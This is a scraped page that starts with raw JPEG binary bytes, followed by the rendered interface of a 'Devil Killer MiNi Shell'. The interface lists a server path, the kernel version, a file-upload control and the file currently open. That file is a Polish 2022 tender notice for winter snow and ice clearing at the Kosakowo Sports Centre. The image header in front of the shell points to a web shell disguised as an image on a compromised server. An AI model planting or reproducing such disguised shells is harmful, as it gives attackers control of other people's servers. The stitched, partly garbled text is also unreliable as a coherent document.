JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20221011/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20221011/0038561201-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Zimowe utrzymanie terenów w Centrum Sportowym Kosakowo w okresie zimowym 2022/2023 – 2 EDYCJA </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Kosakowo Sport Spółka z ograniczoną odpowiedzialnością</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 520292081</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Gen. W. Andersa 2A</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Pogórze</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">81-198</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">pomorskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL634 - Gdański</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">sekretariat@kosakowosport.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.kosakowosport.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - osoba prawna, o której mowa w art. 4 pkt 3 ustawy (podmiot prawa publicznego)</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Rekreacja, kultura i religia</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Zimowe utrzymanie terenów w Centrum Sportowym Kosakowo w okresie zimowym 2022/2023 – 2 EDYCJA </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-7c18a24d-4925-11ed-9171-f6b7c7d59353</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00385612</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-10-11</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/transakcja/672068 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">Komunikacja w postępowaniu o udzielenie zamówienia w tym składanie ofert,<br/>wymiana informacji oraz przekazywanie dokumentów lub oświadczeń między Zamawiającym a Wykonawcą, z uwzględnieniem<br/>wyjątków określonych w ustawie, odbywa się przy użyciu środków komunikacji elektronicznej. Przez środki komunikacji<br/>elektronicznej rozumie się środki komunikacji elektronicznej zdefiniowane w ustawie z dnia 18 lipca 2002 r. o świadczeniu usług<br/>drogą elektroniczną (Dz.U. z 2020 r. poz. 344). Adres strony internetowej prowadzonego postępowania:<br/>https://platformazakupowa.pl/transakcja/672068</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. Komunikacja między Zamawiającym<br/>a Wykonawcami odbywa się za pośrednictwem https://platformazakupowa.pl/ i formularza „Wyślij wiadomość do Zamawiającego”.<br/>Za datę przekazania (wpływu) oświadczeń, wniosków, zawiadomień oraz informacji przyjmuje się datę ich przekazania za<br/>pośrednictwem https://platformazakupowa.pl/ poprzez kliknięcie przycisku „Wyślij wiadomość do Zamawiającego” po których pojawi<br/>się komunikat, że wiadomość została wysłana do Zamawiającego. 2. Zamawiający będzie przekazywał Wykonawcom informacje w<br/>formie elektronicznej za pośrednictwem https://platformazakupowa.pl/. Informacje dotyczące odpowiedzi na pytania, zmiany<br/>specyfikacji, zmiany terminu składania i otwarcia ofert Zamawiający będzie zamieszczał na platformie<br/>https://platformazakupowa.pl/pn/kosakowosport w sekcji “Komunikaty”. Korespondencja, której zgodnie z obowiązującymi<br/>przepisami adresatem jest konkretny Wykonawca, będzie przekazywana w formie elektronicznej za pośrednictwem<br/>https://platformazakupowa.pl/ do konkretnego Wykonawcy.<br/>3. Zamawiający, zgodnie z §11 ust. 2 Rozporządzenia Prezesa Rady Ministrów z dnia 30 grudnia 2020r. w sprawie sposobu<br/>sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji<br/>elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub konkursie (Dz. U. z 2020r. poz. 2452), zamieszcza<br/>wymagania dotyczące specyfikacji połączenia, formatu przesyłanych danych oraz szyfrowania i oznaczania czasu przekazywania i<br/>odbioru danych za pośrednictwem platformazakupowa.pl, tj.:<br/>1) stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż 512 kb/s,<br/>2) komputer klasy PC lub MAC o następującej konfiguracji: pamięć min. 2 GB Ram, procesor Intel IV 2 GHZ lub jego nowsza wersja,<br/>jeden z systemów operacyjnych - MS Windows 7, Mac Os x 10 4, Linux, lub ich nowsze wersje,<br/>3) zainstalowana dowolna, inna przeglądarka internetowa niż Internet Explorer,<br/>4) włączona obsługa JavaScript,<br/>5) zainstalowany program Adobe Acrobat Reader lub inny obsługujący format plików .pdf,<br/>6) platformazakupowa.pl działa według standardu przyjętego w komunikacji sieciowej – kodowanie UTF8;<br/>7) Oznaczenie czasu odbioru danych przez platformę zakupową stanowi datę oraz dokładny czas (hh:mm:ss) generowany wg. czasu<br/>lokalnego serwera synchronizowanego z zegarem Głównego Urzędu Miar.<br/>4. Oferta oraz przedmiotowe środki dowodowe składane elektronicznie muszą zostać podpisane elektronicznym kwalifikowanym<br/>podpisem lub elektronicznym podpisem zaufanym lub elektronicznym podpisem osobistym. W procesie składania oferty, w tym<br/>przedmiotowych środków dowodowych na platformie, kwalifikowany podpis elektroniczny lub elektronicznym podpis zaufany lub<br/>elektronicznym podpis osobisty Wykonawca składa bezpośrednio na dokumencie, który następnie przesyła do systemu. 4.<br/>Rozszerzenia plików wykorzystywanych przez Wykonawców muszą być zgodne z Załącznikiem nr 2 do Rozporządzenia Rady<br/>Ministrów z dnia 12 kwietnia 2012 r. w sprawie Krajowych Ram Interoperacyjności, minimalnych wymagań dla rejestrów publicznych i<br/>wymiany informacji w postaci elektronicznej oraz minimalnych wymagań dla systemów teleinformatycznych. 5. Zamawiający<br/>rekomenduje wykorzystanie formatów: .pdf .doc .docx .xls .xlsx .jpg (.jpeg) ze szczególnym wskazaniem na .pdf. 6. W celu<br/>ewentualnej kompresji danych Zamawiający rekomenduje wykorzystanie jednego z rozszerzeń:.zip , .7Z. 6.Zamawiający nie<br/>przewiduje sposobu komunikowania się z Wykonawcami w inny sposób niż określony w SWZ.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1. Zgodnie z art. 13 ust. 1 i 2 oraz art. 14 ust. 1 i 2 rozporządzenia Parlamentu<br/>Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem<br/>danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o<br/>ochronie danych, Dz. Urz. UE L 119 z 04.05.2016, str. 1, zwanym dalej: Rozporządzeniem 2016/679) oraz przepisami ustawy z dnia<br/>11 września 2019 roku Prawo zamówień publicznych (t.j. Dz.U. z 2022 roku, poz. 1710 z późn. zm., dalej: Ustawa), Zamawiający<br/>informuje, że:<br/>1) administratorem danych osobowych Wykonawcy będącego osobą fizyczną oraz osób fizycznych, których dane osobowe<br/>bezpośrednio lub pośrednio Wykonawca pozyskał oraz udostępnił Zamawiającemu w celu ubiegania się o udzielenie zamówienia<br/>publicznego w niniejszym postępowaniu lub zawarcia umowy na wykonanie zamówienia (np. osób, których dane służą do wykazania<br/>spełniania przez Wykonawcę warunków udziału w postępowaniu, osób reprezentujących Wykonawcę, osób kierowanych do<br/>realizacji zamówienia, osób fizycznych prowadzących działalność gospodarczą, które zostaną wskazane przez Wykonawcę jako<br/>podwykonawca - dalej: Przedstawiciel lub Przedstawiciele) jest Kosakowo Sport Sp. z o.o. z siedzibą w Pogórzu przy ul. Gen. W.<br/>Andersa 2A, 81-198 Kosakowo, KRS 00000929172, NIP 587-173-26-02, Regon 5020292081, www.kosakowosport.pl, e-mail:<br/>sekretariat@kosakowosport.pl (dalej: Administrator);<br/>2) we wszelkich sprawach dotyczących przetwarzania danych osobowych przez Administratora należy kontaktować się z jego<br/>Inspektorem Ochrony Danych, drogą elektroniczną na adres e-mail: iod@kosakowosport.pl lub drogą poczty tradycyjnej na adres Administratora wskazany w pkt. 1) powyżej, z dopiskiem „Inspektor Ochrony Danych”;<br/>3) dane osobowe Wykonawcy będącego osobą fizyczną przetwarzane będą w celu:<br/>a) przeprowadzenia postępowania o udzielenie zamówienia publicznego – podstawą prawną przetwarzania danych osobowych jest<br/>niezbędność przetwarzania do wypełnienia obowiązku prawnego ciążącego na administratorze (art. 6 ust. 1 pkt. c oraz art. 10<br/>Rozporządzenia 2016/679 w związku z przepisami Ustawy);<br/>b) prowadzenia negocjacji, zawarcia lub wykonania umowy – podstawą prawną przetwarzania danych osobowych jest niezbędność<br/>przetwarzania do wykonania umowy, której stroną jest osoba, której dane dotyczą, lub do podjęcia działań na żądanie osoby, której<br/>dane dotyczą, przed zawarciem umowy (art. 6 ust. 1 pkt. b Rozporządzenia 2016/679);<br/>c) wypełnienia obowiązków prawnych ciążących na Administratorze – podstawą prawną przetwarzania jest art. 6 ust. 1 pkt. c<br/>Rozporządzenia 2016/679 w związku w szczególności z przepisami o rachunkowości oraz przepisami podatkowymi;<br/>d) realizacji prawnie uzasadnionych interesów Administratora polegających w szczególności na możliwości ustalenia lub<br/>dochodzenia ewentualnych roszczeń lub obrony przed takimi roszczeniami przez Administratora – podstawą prawną przetwarzania<br/>danych osobowych jest art. 6 ust. 1 pkt. f Rozporządzenia 2016/679;<br/>e) poprzez monitoring wizyjny prowadzony przez Administratora na jego nieruchomościach lub zarządzanych przez niego<br/>nieruchomościach w celu zapewnienia bezpieczeństwa lub ochrony mienia lub zachowania w tajemnicy informacji, których<br/>ujawnienie mogłoby narazić Administratora lub stronę trzecią na szkodę – podstawą prawną przetwarzania danych są prawnie<br/>uzasadnione interesy realizowane przez administratora lub przez stronę trzecią (art. 6 ust. 1 pkt. f Rozporządzenia 2016/679).<br/>Pozostałe informacje w zakresie przepisów dot. ochrony danych osobowych znajdują się w Rozdziale nr 2 SWZ.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">7/ZP/TP/2022</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Przedmiotem zamówienia jest świadczenie usług w zakresie zimowego utrzymania terenów w Centrum Sportowym<br/>Kosakowo zlokalizowanym przy ul. Żeromskiego nr 11 w Kosakowie w okresie od 01.11.2022 roku do 31.03.2023 roku,<br/>zwanym dalej „Centrum Sportowe Kosakowo”.<br/>2. Łączna powierzchnia terenów do odśnieżania Centrum Sportowego Kosakowo stanowi około 8.800 m2 oraz obejmuje:<br/>1) dwa parkingi obiektu (parking główny i parking dla pracowników przy wejściu bocznym do budynku szkoły),<br/>2) dziedziniec szkoły,<br/>3) chodniki: od bramy bocznej do wejścia głównego do budynku pływalni, wejścia głównego do budynku szkoły oraz wejścia<br/>bocznego do budynku szkoły;<br/>4) schody oraz podesty (przed wejściem głównym do budynku pływalni, przed wejściem głównym do budynku szkoły, przed<br/>wejściem bocznym do budynku szkoły);<br/>5) droga pożarowa o nawierzchni asfaltowej.<br/>mapa terenu Centrum Sportowego Kosakowo objętego przedmiotem zamówienia stanowi załącznik nr 10 do SWZ.<br/>3. W ramach przedmiotu zamówienia Wykonawca zobowiązany będzie do:<br/>1) wykonania usługi gotowości do podjęcia czynności związanych z zimowym utrzymaniem terenów w Centrum Sportowym<br/>Kosakowo, polegającym w szczególności na utrzymywaniu stałej gotowości technicznej do świadczenia usług w całym<br/>okresie obowiązywania umowy oraz do bieżącego monitorowania warunków pogodowych;<br/>2) wykonania usługi zimowego utrzymania terenów w Centrum Sportowym Kosakowo, polegającym w szczególności na:<br/>a) odśnieżaniu chodników, ciągów pieszych, parkingów, dziedzińca szkoły, drogi pożarowej przy użyciu pojazdu typu ciągnik<br/>z piaskarką i pługiem lub innym pojazdem mechanicznym przystosowanym do wykonywania w/w prac;<br/>b) zwalczaniu i zapobieganiu powstawania śliskości na terenach objętych zamówieniem przy użyciu piasku z solą drogową<br/>(sól drogowa musi być zgodna z Normą PN-C-84081-2:1998) w składzie wagowym 80% piasku + 20% soli drogowej, przy<br/>użyciu pojazdu typu ciągnik z piaskarką i pługiem lub innym pojazdem mechanicznym przystosowanym do wykonywania<br/>w/w prac;<br/>c) odśnieżaniu z jednoczesnym zwalczaniem, zapobieganiem powstawania i likwidacją śliskości terenów objętych<br/>zamówieniem przy użyciu mieszaniny piasku z solą drogową (sól drogowa musi być zgoda z Normą PN-C-84081-2:1998) w<br/>składzie wagowym 80% piasku + 20% soli drogowej, przy użyciu pojazdu typu ciągnik z piaskarką i pługiem lub innym<br/>pojazdem mechanicznym przystosowanym do wykonywania w/w prac;<br/>d) przygotowaniu mieszanki w składzie, o których mowa w lit. b) i c) z materiałów własnych, magazynowanie mieszanki oraz<br/>jej transport,<br/>e) zwalczaniu, zapobieganiu powstawaniu śliskości terenów objętych zmówieniem przy użyciu wyłącznie soli drogowej (sól<br/>drogowa musi być zgoda z Normą PN-C-84081-2:1998) w miejscach szczególnie niebezpiecznych takich jak: schody, chodniki, ciągi piesze;<br/>f) usługi wymienione w lit. a) – e) w szczególności dot. schodów, ciągów pieszych, chodników niedostępnych dla sprzętu<br/>mechanicznego należy wykonać metodą ręczną. 4. Zimowe utrzymanie terenów Centrum Sportowego Kosakowo objętych<br/>przedmiotem zamówienia, realizowane będzie 24 h na dobę we wszystkie dni w tygodniu (od poniedziałku do niedzieli<br/>włącznie), z wyłączeniem dni ustawowo wolnych od pracy, świąt państwowych i kościelnych, takich jak:<br/> 1.11.2022 r.<br/> 11.11.2022 r.<br/> 24.12.2022 r.<br/> 25.12.2022 r.<br/> 26.12.2022 r.<br/> 1.01.2023 r.<br/>W dniach wolnych od pracy, w święta państwowe i kościelne wskazane powyżej Zamawiający zastrzega sobie prawo do<br/>wezwania Wykonawcy do podjęcia działań określonych przedmiotem zamówienia wyłącznie na wezwanie telefoniczne<br/>Zamawiającego. Wykonawca zobowiązany będzie do podjęcia działań w czasie maksymalnym 3 godzin (180 minut) od<br/>nawiązania połączenia telefonicznego lub wysłania informacji przez wiadomość sms z telefonu komórkowego<br/>upoważnionego przedstawiciela Zamawiającego - w przypadku nieodebrania połączenia telefonicznego przez Wykonawcę.<br/>5. Wykonawca samodzielnie będzie podejmował decyzje o uruchomieniu czynności określonych w ust. 3 pkt. 2):<br/>1) z zastrzeżeniem, iż rozpoczęcie tych czynności odbędzie się nie później niż o godzinie 04:00 rano, a zakończenie tych<br/>czynności nastąpi maksymalnie do godziny 07:00 rano każdego dnia,<br/>2) oraz w godzinach 06:00-22:00 – Wykonawca zobowiązany będzie do podejmowania czynności maksymalnie do 3 godzin<br/>(180 minut) od wystąpienia zjawisk atmosferycznych powodujących śliskość nawierzchni lub zaleganie śniegu z<br/>zastrzeżeniem ust. 6.<br/>6. Zamawiający uprawniony również będzie do samodzielnego wezwania Wykonawcy do wykonywania czynności, o których<br/>mowa w ust.4 pkt. 2) na zgłoszenie telefoniczne. W takim przypadku, Wykonawca zobowiązany będzie do podjęcia działań<br/>w czasie maksymalnym 3 godzinn (180 minut) od nawiązania połączenia telefonicznego lub wysłania informacji przez<br/>wiadomość sms z telefonu komórkowego upoważnionego przedstawiciela Zamawiającego - w przypadku nieodebrania<br/>połączenia telefonicznego przez Wykonawcę.<br/>7. Przewidywana łączna ilość jednostek roboczogodzin wykonywania usługi zimowego utrzymania terenów w Centrum<br/>Sportowym Kosakowo, o którym mowa w ust. 3 pkt. 2) w okresie obowiązywania całej umowy to 435 godzin, przy czym<br/>Zamawiający przyjmuje, iż aby wykonać prawidłowo wszystkie czynności określone w ust. 3 pkt. 2) podczas jednego<br/>działania/interwencji należy przyjąć 3 godziny (180 minut) pracy usług odśnieżania i usuwania śliskości terenów objętych<br/>przedmiotem zamówienia.<br/>8. Zamawiający wymaga stosowania przez Wykonawcę jako materiału do usuwania śliskości zimowej - mieszanki piasku z<br/>solą drogową, gdzie mieszanka zawierać będzie co najmniej 20% soli drogowej (sól drogowa musi być zgoda z Normą PNC-<br/>84081-2:1998). Pozyskiwanie i magazynowanie materiałów do usuwania śliskości zimowej leży w gestii Wykonawcy.<br/>Pojęcia wymienione powyżej oznaczają:<br/>1) piasek – kruszywo naturalne o uziarnieniu do 4 mm,<br/>2) sól drogowa – powinna zawierać co najmniej 90% chlorku sodu NaCl,<br/>3) śliskość zimowa – zjawisko występujące na drogach wskutek tworzenia się na nawierzchniach warstwy lodu albo<br/>zlodowaciałego lodu lub ubitego śniegu.<br/>9. Pojazdy mechaniczne używane do wykonywania przedmiotu zamówienia powinny być wyposażone w ostrzegawczy<br/>sygnał świetlny błyskowy, barwy żółtej samochodowej umieszczony na kabinie pojazdu zgodnie z warunkami wynikającymi z<br/>ustawy z dnia 26.06.1997 r. – Prawo o ruchu drogowym (Dz.U. z 2022 poz. 988).<br/>10. Operator pojazdów, o których mowa w ust. 9, musi posiadać odpowiednie uprawnienia tj. wymaganą kategorię prawa<br/>jazdy oraz znajomość obsługi pojazdów mechanicznych.<br/>11. Wykonawca w okresie obowiązywania umowy zapewni całodobową łączność telefoniczną na dwa numery telefonów,<br/>umożliwiającą wezwanie Wykonawcy do wykonywania przedmiotu umowy.<br/>12. W przypadku stwierdzenia nienależytego wykonania przedmiotu zamówienia lub braku jego wykonania, Wykonawca<br/>zobowiązany będzie do ponownego niezwłocznego jej wykonania w terminie do 2 godzin od zgłoszenia telefonicznego.<br/>13. Szczegółowy opis przedmiotu zamówienia stanowi Rozdział nr 4 SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">90620000-9 - Usługi odśnieżania</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">90630000-2 - Usługi usuwania oblodzeń</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja od do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2022-11-01 do 2023-03-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">P = PK + PC gdzie:<br/>P = łączna liczba punktów przyznanych badanej ofercie,<br/>PK – liczba punktów dla kryterium „Ceny oferty brutto”,<br/>PC – liczba punktów dla kryterium „Maksymalny czas rozpoczęcia akcji zimowej”.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Maksymalny czas reakcji od otrzymania wezwania telefonicznego do przystąpienia do realizacji usługi</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 